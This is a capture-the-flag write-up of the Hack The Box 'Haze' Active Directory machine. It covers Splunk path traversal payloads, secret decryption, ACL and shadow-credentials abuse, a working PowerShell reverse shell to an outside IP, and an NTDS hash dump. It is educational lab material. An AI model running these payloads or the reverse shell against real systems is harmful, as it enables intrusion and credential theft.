Haze

A hard active directory windows machine

Enumeration

This is the nmap result below :-


┌──(krrish㉿krrish)-[~/hackthebox/haze]
└─$ nmapAutomator -H 10.129.232.50 -t All

Running all scans on 10.129.232.50

Host is likely running Windows


---------------------Starting Port Scan-----------------------



PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
5985/tcp open  wsman
8000/tcp open  http-alt
8088/tcp open  radan-http
8089/tcp open  unknown



---------------------Starting Script Scan-----------------------



PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-12-31 03:08:23Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: haze.htb, Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: haze.htb, Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: haze.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: haze.htb, Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8000/tcp open  http          Splunkd httpd
|_http-server-header: Splunkd
| http-robots.txt: 1 disallowed entry
|_/
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.129.232.50:8000/en-US/account/login?return_to=%2Fen-US%2F
8088/tcp open  ssl/http      Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after:  2028-03-04T07:29:08
|_http-title: 404 Not Found
|_ssl-date: TLS randomness does not represent time
8089/tcp open  ssl/http      Splunkd httpd
|_http-server-header: Splunkd
|_ssl-date: TLS randomness does not represent time
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after:  2028-03-04T07:29:08
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2025-12-31T03:09:08
|_  start_date: N/A
|_clock-skew: 8h00m07s
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required




---------------------Starting Full Scan------------------------



PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
8000/tcp  open  http-alt
8088/tcp  open  radan-http
8089/tcp  open  unknown
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49669/tcp open  unknown
49674/tcp open  unknown
64855/tcp open  unknown
64857/tcp open  unknown
64860/tcp open  unknown
64872/tcp open  unknown
64885/tcp open  unknown
64904/tcp open  unknown

Tried doing guest login in smb with the help of nxc but it didn't work

Then in the nmap result I saw the port 8000 and it had splunk running on this link http://dc01.haze.htb:8000/en-US/account/login?return_to=%2Fen-US%2F

Another thing we see that is port 8089 and so I go onto the website but it does not work in http , so we switch to https , https://haze.htb:8089/ but unfortunately my website is not loading in the browser , so let's try with curl

curl -k https://haze.htb:8089/
─(krrish㉿krrish)-[~/hackthebox/haze]
└─$ curl -k https://haze.htb:8089/
<?xml version="1.0" encoding="UTF-8"?>
<!--This is to override browser formatting; see server.conf[httpServer] to disable. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .-->
<?xml-stylesheet type="text/xml" href="/static/atom.xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xmlns:s="http://dev.splunk.com/ns/rest">
  <title>splunkd</title>
  <id>https://haze.htb:8089/</id>
  <updated>2025-12-31T18:07:42-08:00</updated>
  <generator build="78803f08aabb" version="9.2.1"/>
  <author>
    <name>Splunk</name>
  </author>
  <entry>
    <title>rpc</title>
    <id>https://haze.htb:8089/rpc</id>
    <updated>1969-12-31T16:00:00-08:00</updated>
    <link href="/rpc" rel="alternate"/>
  </entry>
  <entry>
    <title>services</title>
    <id>https://haze.htb:8089/services</id>
    <updated>1969-12-31T16:00:00-08:00</updated>
    <link href="/services" rel="alternate"/>
  </entry>
  <entry>
    <title>servicesNS</title>
    <id>https://haze.htb:8089/servicesNS</id>
    <updated>1969-12-31T16:00:00-08:00</updated>
    <link href="/servicesNS" rel="alternate"/>
  </entry>
  <entry>
    <title>static</title>
    <id>https://haze.htb:8089/static</id>
    <updated>1969-12-31T16:00:00-08:00</updated>
    <link href="/static" rel="alternate"/>
  </entry>
</feed>

so the splunk version is 9.2.1 , so let's find CVE for that , the reason i switched for cve as I didn't get valid credentials through bruteforcing and default credentials
found this CVE-2024-36991 and this was a path traversal vulnerability , can read more about that in this blog

https://www.vicarius.io/vsociety/posts/exploiting-path-traversal-in-splunk-cve-2024-36991
https://github.com/bigb0x/CVE-2024-36991

this exploit on github allows us to read the /etc/passwd

└─$python CVE-2024-36991.py -u http://dc01.haze.htb:8000/
/home/krrish/hackthebox/haze/CVE-2024-36991/CVE-2024-36991.py:55: SyntaxWarning: invalid escape sequence '\ '
  LOG_DIR = 'logs'


  ______     _______     ____   ___ ____  _  _        _____  __   ___   ___  _
 / ___\ \   / | ____|   |___ \ / _ |___ \| || |      |___ / / /_ / _ \ / _ \/ |
| |    \ \ / /|  _| _____ __) | | | |__) | || |_ _____ |_ \| '_ | (_) | (_) | |
| |___  \ V / | |__|_____/ __/| |_| / __/|__   _|________) | (_) \__, |\__, | |
 \____|  \_/  |_____|   |_____|\___|_____|  |_|      |____/ \___/  /_/   /_/|_|

-> POC CVE-2024-36991. This exploit will attempt to read Splunk /etc/passwd file.
-> By x.com/MohamedNab1l
-> Use Wisely.

[INFO] Log directory created: logs
[INFO] Testing single target: http://dc01.haze.htb:8000/
[VLUN] Vulnerable: http://dc01.haze.htb:8000/
:admin:$6$Ak3m7.aHgb/NOQez$O7C8Ck2lg5RaXJs9FrwPr7xbJBJxMCpqIx3TG30Pvl7JSvv0pn3vtYnt8qF4WhL7hBZygwemqn7PBj5dLBm0D1::Administrator:admin:[email protected]:::20152
:edward:$6$3LQHFzfmlpMgxY57$Sk32K6eknpAtcT23h6igJRuM1eCe7WAfygm103cQ22/Niwp1pTCKzc0Ok1qhV25UsoUN4t7HYfoGDb4ZCv8pw1::[email protected]:user:[email protected]:::20152
:mark:$6$j4QsAJiV8mLg/bhA$Oa/l2cgCXF8Ux7xIaDe3dMW6.Qfobo0PtztrVMHZgdGa1j8423jUvMqYuqjZa/LPd.xryUwe699/8SgNC6v2H/:::user:[email protected]:::20152
:paul:$6$Y5ds8NjDLd7SzOTW$Zg/WOJxk38KtI.ci9RFl87hhWSawfpT6X.woxTvB4rduL4rDKkE.psK7eXm6TgriABAhqdCPI4P0hcB8xz0cd1:::user:[email protected]:::20152

but these hashes didn't cracked

Foothold & user.txt

We need to find some another way to get some creds , so let's start by reading how does authentication works in the splunk where are sensitive files are stored

so there is a splunk.secret file that is used to encrypt / decrypt passwords in the .conf (configuration) files . To know more about this refer to sources below they are good to have some knowledge

https://community.splunk.com/t5/Knowledge-Management/What-is-the-splunk-secret-file-and-is-it-possible-to-change-it/m-p/331207#M6092
https://help.splunk.com/en/data-management/splunk-enterprise-admin-manual/9.1/configuration-file-reference/9.1.5-configuration-file-reference/authentication.conf
https://help.splunk.com/en/splunk-enterprise/get-started/install-and-upgrade/9.2/install-splunk-enterprise-on-windows/install-on-windows

To get these lets look at the initial payload that is being used to read /etc/passwd which is /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd
This was the payload with the curl command to get /etc/passwd

curl  "http://dc01.haze.htb:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd"

Just change the path in the /etc/ , you can get the proper path from the above sources

──(krrish㉿krrish)-[~/hackthebox/haze]
└─$ curl  "http://dc01.haze.htb:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../etc/auth/splunk.secret"
NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD

──(krrish㉿krrish)-[~/hackthebox/haze]
└─$ curl  "http://dc01.haze.htb:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../etc/system/local/authentication.conf"
[splunk_auth]
minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0

[Haze LDAP Auth]
SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
charset = utf8
emailAttribute = mail
enableRangeRetrieval = 0
groupBaseDN = CN=Splunk_LDAP_Auth,CN=Users,DC=haze,DC=htb
groupMappingAttribute = dn
groupMemberAttribute = member
groupNameAttribute = cn
host = dc01.haze.htb
nestedGroups = 0
network_timeout = 20
pagelimit = -1
port = 389
realNameAttribute = cn
sizelimit = 1000
timelimit = 15
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname

[authentication]
authSettings = Haze LDAP Auth
authType = LDAP

─(krrish㉿krrish)-[~/hackthebox/haze]
└─$ curl "http://dc01.haze.htb:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../etc/auth/splunkweb/privkey.pem"
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAuwXy9sf/um0JzLJMowEzuEh2fQf5Jf+RsqoBh1lWLPdfqCkH
4LBGAReZtkxWYxSpfiKG8wgsgh+NZT0j0WJvAxoaqNzbDKqXvsxMA+w6LkLIG3D7
wDH5Ru4rr31dxNqaFrNl+NtcCUrBCKOGrkEy07VeFAmKr/MBHUyZF8P18g7hBOPT
WZfihF3Fptd40kp2LuhSF2foy3E4bjRbNLHaxU3SWitzZuDXKRBaPOpddqJovPJq
/wVtPH/xHvV4KmFzKN0CqHKtVM0U+cQpQUNTFX3X8Gvt//WZYzb26aQDk2PEsfil
S0XHKWQzBzpuHlf4OS1bSVlHSUt2wk1rIXhPHwIDAQABAoIBAQCAUpGloA6oNH6f
08rfoUiCbj3Whiz+VH/8rcdEvhhx2/3nXNfJ5Ej0IORX/8LaUugE4t3jTT10vv9+
clfsJ/TxlOyr5nXqF/bsdDLIEkLNUQcKRRiHhAJ9F5gj3goDstY9MzSJbsGUopUW
P1V+pL+iIXR+nRlqpnqiRtdYRh2vyjdvuP0Ih8+J6Npw/PWLFCU/X9Q4Tsq6+FN+
VTapneYy3diTZ3LRFSKRJ0f8nxzr8JPMziRv41X4TmHj6gN9owEvmATeeJ9Mndg/
lSe9JluNSW3KueRKZgteJwM6GSw3ikUryLiDTICazKdjXzCd1ZFr2qlHpB0CIqRI
5jJBoA0hAoGBAN4C87j8otA4BM8VNMWLWtuE3YsY6VgXwHqSkEjgxyxdWPit89qh
GQHqSNq443wIaJHLwPSYe0TOOt1OFnJAuFP/v3RPW9/hrxPZnthVUYxC7RgTy5gU
2FbTp891m91VQhwNciyahoSPjZrAzHH5HqGVimTmiBspDKIwIUNbFOavAoGBANen
vYKWuciUkUbmH8BJGGvr1KlPSNtOIDWNBu0M8xF2BhSmxM5nZrkC/dlXaOaSNAi/
pCAH6S6B3QS6Q7souzQy4jKRPKmn8TwjLv4TD5k+8cO3E6AxtNVd36hWf+gpVm9j
ITIi29ntMdM6BWoxM3198TxRYII1mK58rDhPAjqRAoGAYjugJ6vxRnxi9FYHwZjF
nPgPJurg5M+tpQ6QtQ5wUpsDMRWXHpfFfulxTwYb8deunUQwnomRkYJG3YEdwXQN
m21AA3DR0CAF3ZyfAk3OBWffjJXFsgcXKmQAjnUVgDunQs5YRJAjESiLmXvRemSm
Pwzx7W9rrcjeBC2Tqj/04ZUCgYBtVvLS3zDa7diqpcq7Z1Qmg6+TGEvMRVQ3UoWM
cuBangh/N/7Y17xRWZ7zL0pUfRQ8y02fn+MuXVF+MCJfJkukL5hYIyMqsaex4fTV
hTyHak6R+KTOt+UDuVDIvPKk9zCH0S7niJ0HZSe5/NT5/nAo1E4XUvsniZ0b+sIm
2og6wQKBgHFI4Q8cUtJGD+UB9Ud1sxR4stU0IXYJQfXkIe1HnQy2yCzTWujjAtmf
7rEV3hQXAL+EzfJxElbV5GnC38hmQo4i2E1Abx0xVL7cn/d1jQ9sXw215jsa+o8/
GqSXzI/urwRrZLPSrfZ9lmnGCP3k4h8s8uCcY/980oEeNKh4w/Pg
-----END RSA PRIVATE KEY-----

┌──(krrish㉿krrish)-[~/hackthebox/haze]
└─$ curl "http://dc01.haze.htb:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../etc/system/local/server.conf"
[general]
serverName = dc01
pass4SymmKey = $7$lPCemQk01ejJvI8nwCjXjx7PJclrQJ+SfC3/ST+K0s+1LsdlNuXwlA==

[sslConfig]
sslPassword = $7$/nq/of9YXJfJY+DzwGMxgOmH4Fc0dgNwc5qfCiBhwdYvg9+0OCCcQw==

[lmpool:auto_generated_pool_download-trial]
description = auto_generated_pool_download-trial
peers = *
quota = MAX
stack_id = download-trial

[lmpool:auto_generated_pool_forwarder]
description = auto_generated_pool_forwarder
peers = *
quota = MAX
stack_id = forwarder

[lmpool:auto_generated_pool_free]
description = auto_generated_pool_free
peers = *
quota = MAX
stack_id = free

[license]
active_group = Forwarder

Now the main task is to crack the hashes and I haven't seen this $7$ hash format , so let's google and try to decrypt that

Here we can use this tool splunksecrets to decrypt this , the installation guide is inside the repo

(env)─(krrish㉿krrish)-[~/hackthebox/haze]
└─$ splunksecrets splunk-decrypt -S splunk.secret --ciphertext '$7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY='
Ld@p_Auth_Sp1unk@2k24

──(krrish㉿krrish)-[~/hackthebox/haze]
└─$ nxc smb 10.129.5.3 -u paul.taylor -p Ld@p_Auth_Sp1unk@2k24
SMB         10.129.5.3      445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.5.3      445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24

Then we can just enumerate the domain with --rid-brute and --shares

nxc smb 10.129.5.3 -u paul.taylor -p Ld@p_Auth_Sp1unk@2k24 --rid-brute
nxc smb 10.129.5.3 -u paul.taylor -p Ld@p_Auth_Sp1unk@2k24 --shares

Ok lets go on for more enumeration with the usernames we have

─(krrish㉿krrish)-[~/hackthebox/haze]
└─$ cat users.txt
paul.taylor
mark.adams
edward.martin
alexander.green
Haze-IT-Backup$

nxc smb 10.129.5.3 -u users.txt -p Ld@p_Auth_Sp1unk@2k24 --continue-on-success

with this we can see that user mark.adams has the same password as the paul.taylor

Let's take the bloodhound dump and see what we can get from there & remember to do sudo ntpdate haze.htb , and use mark.adams as user to take dump and below is the reason for that

In bloodhound I saw that mark.adams is a member of GMSA_MANAGERS but nothing after that also mark.adams does not have any Outbound Object Control

With the help of bloodyAD I tried to get more onto the writable by the mark.adams and found this

bloodyAD --host dc01.haze.htb -d haze.htb -u mark.adams -p Ld@p_Auth_Sp1unk@2k24 get writable --detail

This attribute msDS-GroupMSAMembership tells us that if a requestor has permission to retrieve the password for a group MSA and we can write

bloodyAD --host dc01.haze.htb -d haze.htb -u mark.adams -p Ld@p_Auth_Sp1unk@2k24 get search --attr msDS-GroupMSAMembership | grep msDS-GroupMSAMembership

bloodyAD --host dc01.haze.htb -d haze.htb -u mark.adams -p Ld@p_Auth_Sp1unk@2k24 msldap gmsa

more enumeration on from on that attribute msDS-GroupMSAMembership

To update write that to our user we can use the below command & the SID is of the our user mark.adams

bloodyAD --host dc01.haze.htb -d haze.htb -u mark.adams -p Ld@p_Auth_Sp1unk@2k24 set object Haze-IT-Backup$ msDS-GroupMSAMembership -v 'O:S-1-5-32-544D:(A;;0xf01ff;;;S-1-5-21-323145914-28650650-2368316563-1104)'

┌──(krrish㉿krrish)-[~/hackthebox/haze]
└─$ nxc ldap 10.129.5.3 -u mark.adams -p Ld@p_Auth_Sp1unk@2k24 --gmsa
LDAP        10.129.5.3      389    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb) (signing:None) (channel binding:Never)
LDAP        10.129.5.3      389    DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24
LDAP        10.129.5.3      389    DC01             [*] Getting GMSA Passwords
LDAP        10.129.5.3      389    DC01             Account: Haze-IT-Backup$      NTLM: f0735b4eb7ed13d5011821e9ee5dc848     PrincipalsAllowedToReadPassword: mark.adams

When I saw in bloodhound for this user Haze-IT-Backup$ Outbound Object Control there was one and nothing after the group owning so decided to take the bloodhound dump again with the Haze-IT-Backup$ hash

To exploit this the commands are below :-

owneredit.py -action write -new-owner 'Haze-IT-Backup$' -target 'Support_Services' 'haze.htb'/'Haze-IT-Backup$' -hashes :f0735b4eb7ed13d5011821e9ee5dc848

dacledit.py -action 'write' -rights 'WriteMembers' -principal 'Haze-IT-Backup$' -target-dn 'CN=SUPPORT_SERVICES,CN=USERS,DC=HAZE,DC=HTB' 'haze.htb'/'Haze-IT-Backup$' -hashes :f0735b4eb7ed13d5011821e9ee5dc848

bloodyAD --host dc01.haze.htb -d haze.htb -u Haze-IT-Backup$ -p :f0735b4eb7ed13d5011821e9ee5dc848 add groupMember Support_Services Haze-IT-Backup$

bloodyAD --host dc01.haze.htb -d haze.htb -u Haze-IT-Backup$ -p :f0735b4eb7ed13d5011821e9ee5dc848 add shadowCredentials edward.martin

So what are we doing is making the user Haze-IT-Backup$ owner of Support_Services group then giving the right to add members (WriteMembers) , then adding Haze-IT-Backup$ to Support_Services group then performing shadowCredentials attack

Let's grab the user.txt from edward.martin

evil-winrm-py -i dc01.haze.htb -u edward.martin -H 09e0b3eeb2e7a6b0d419e9ff8f4d91af

For root

In bloodhound we can see that the user edward.martin is a member of BACKUP_REVIEWERS group

Further we can see that there is backup folder in C:\ directory , so let's download that and find something juicy

Investigating the backup I found two things that is splunk.secret and a custom authentication.conf

┌──(krrish㉿krrish)-[~/hackthebox/haze/Splunk]
└─$ cat etc/auth/splunk.secret
CgL8i4HvEen3cCYOYZDBkuATi5WQuORBw9g4zp4pv5mpMcMF3sWKtaCWTX8Kc1BK3pb9HR13oJqHpvYLUZ.gIJIuYZCA/YNwbbI4fDkbpGD.8yX/8VPVTG22V5G5rDxO5qNzXSQIz3NBtFE6oPhVLAVOJ0EgCYGjuk.fgspXYUc9F24Q6P/QGB/XP8sLZ2h00FQYRmxaSUTAroHHz8fYIsChsea7GBRaolimfQLD7yWGefscTbuXOMJOrzr/6B

┌──(krrish㉿krrish)-[~/hackthebox/haze/Splunk]
└─$ cat var/run/splunk/confsnapshot/baseline_local/system/local/authentication.conf
[default]

minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0


[Haze LDAP Auth]

SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=alexander.green,CN=Users,DC=haze,DC=htb
bindDNpassword = $1$YDz8WfhoCWmf6aTRkA+QqUI=
charset = utf8
emailAttribute = mail
enableRangeRetrieval = 0
groupBaseDN = CN=Splunk_Admins,CN=Users,DC=haze,DC=htb
groupMappingAttribute = dn
groupMemberAttribute = member
groupNameAttribute = cn
host = dc01.haze.htb
nestedGroups = 0
network_timeout = 20
pagelimit = -1
port = 389
realNameAttribute = cn
sizelimit = 1000
timelimit = 15
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname

[authentication]
authSettings = Haze LDAP Auth
authType = LDAP

let's use the same tool splunksecrets to decrypt the password

(env)─(krrish㉿krrish)-[~/hackthebox/haze]
└─$ cat splunk_secret_1
CgL8i4HvEen3cCYOYZDBkuATi5WQuORBw9g4zp4pv5mpMcMF3sWKtaCWTX8Kc1BK3pb9HR13oJqHpvYLUZ.gIJIuYZCA/YNwbbI4fDkbpGD.8yX/8VPVTG22V5G5rDxO5qNzXSQIz3NBtFE6oPhVLAVOJ0EgCYGjuk.fgspXYUc9F24Q6P/QGB/XP8sLZ2h00FQYRmxaSUTAroHHz8fYIsChsea7GBRaolimfQLD7yWGefscTbuXOMJOrzr/6B

┌──(env)─(krrish㉿krrish)-[~/hackthebox/haze]
└─$ splunksecrets splunk-decrypt -S splunk_secret_1 --ciphertext '$1$YDz8WfhoCWmf6aTRkA+QqUI='
Sp1unkadmin@2k24

The passwords don't work for some reason on any user

Trying this password on the splunk website and it worked with username admin : Sp1unkadmin@2k24

Exploring more in the splunk enterprise didn't gave nothing so looked for some reverse shell through it

https://github.com/0xjpuff/reverse_shell_splunk

Edit the run.ps1 , delete the run.py and edit the inputs.conf

─(krrish㉿krrish)-[~/…/haze/reverse_shell_splunk/reverse_shell_splunk/bin]
└─$ cat run.ps1
#A simple and small reverse shell. Options and help removed to save space.
#Uncomment and change the hardcoded IP address and port number in the below line. Remove all help comments as well.
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.95',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

─(krrish㉿krrish)-[~/…/haze/reverse_shell_splunk/reverse_shell_splunk/default]
└─$ cat inputs.conf
[script://.\bin\run.bat]
disabled = 0
sourcetype = pentest
interval = 10

─(krrish㉿krrish)-[~/hackthebox/haze/reverse_shell_splunk]
└─$ ls
README.md  reverse_shell_splunk

┌──(krrish㉿krrish)-[~/hackthebox/haze/reverse_shell_splunk]
└─$
tar -cvzf reverse_shell_splunk.tgz reverse_shell_splunk
mv reverse_shell_splunk.tgz reverse_shell_splunk.spl

reverse_shell_splunk/
reverse_shell_splunk/default/
reverse_shell_splunk/default/inputs.conf
reverse_shell_splunk/bin/
reverse_shell_splunk/bin/run.bat
reverse_shell_splunk/bin/run.ps1

┌──(krrish㉿krrish)-[~/hackthebox/haze/reverse_shell_splunk]
└─$ ls
README.md  reverse_shell_splunk  reverse_shell_splunk.spl

upload the reverse_shell_splunk.spl here and wait for the reverse shell

This way we can get a reverse shell from splunk and now just we have to abuse SeImpersonatePrivilege

used sweetpotato.exe to add mark.adams in the Administrators group

Let's get the hashdump and access to administrator shell

nxc smb 10.129.5.3 -u mark.adams -p Ld@p_Auth_Sp1unk@2k24 --ntds

Shell of Administator

evil-winrm-py -i dc01.haze.htb -u administrator -H 06dc954d32cb91ac2831d67e3e12027f

┌──(krrish㉿krrish)-[~/hackthebox/haze]
└─$ nxc smb 10.129.5.3 -u mark.adams -p Ld@p_Auth_Sp1unk@2k24 --ntds
SMB         10.129.5.3      445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.5.3      445    DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24 (Pwn3d!)
SMB         10.129.5.3      445    DC01             [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         10.129.5.3      445    DC01             Administrator:500:aad3b435b51404eeaad3b435b51404ee:06dc954d32cb91ac2831d67e3e12027f:::
SMB         10.129.5.3      445    DC01             Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.5.3      445    DC01             krbtgt:502:aad3b435b51404eeaad3b435b51404ee:937e28202a6cdfcc556d1b677bcbe82c:::
SMB         10.129.5.3      445    DC01             haze.htb\paul.taylor:1103:aad3b435b51404eeaad3b435b51404ee:e90878e2fb0a21a11859ff60f1119fb4:::
SMB         10.129.5.3      445    DC01             haze.htb\mark.adams:1104:aad3b435b51404eeaad3b435b51404ee:e90878e2fb0a21a11859ff60f1119fb4:::
SMB         10.129.5.3      445    DC01             haze.htb\alexander.green:1106:aad3b435b51404eeaad3b435b51404ee:6b8caa0cd4f8cb8ddf2b5677a24cc510:::
SMB         10.129.5.3      445    DC01             DC01$:1000:aad3b435b51404eeaad3b435b51404ee:9dcbc33adec3bdc8b2334060002ce1b4:::
SMB         10.129.5.3      445    DC01             Haze-IT-Backup$:1111:aad3b435b51404eeaad3b435b51404ee:f0735b4eb7ed13d5011821e9ee5dc848:::
SMB         10.129.5.3      445    DC01             [+] Dumped 8 NTDS hashes to /home/krrish/.nxc/logs/ntds/DC01_10.129.5.3_2026-01-01_120121.ntds of which 6 were added to the database

Pwn3d the machine !!

NextRetro

Last updated 11 days ago

hashtagEnumeration

hashtagFoothold & user.txt

hashtagFor root

hashtagPwn3d the machine !!

Enumeration

Foothold & user.txt

For root

Pwn3d the machine !!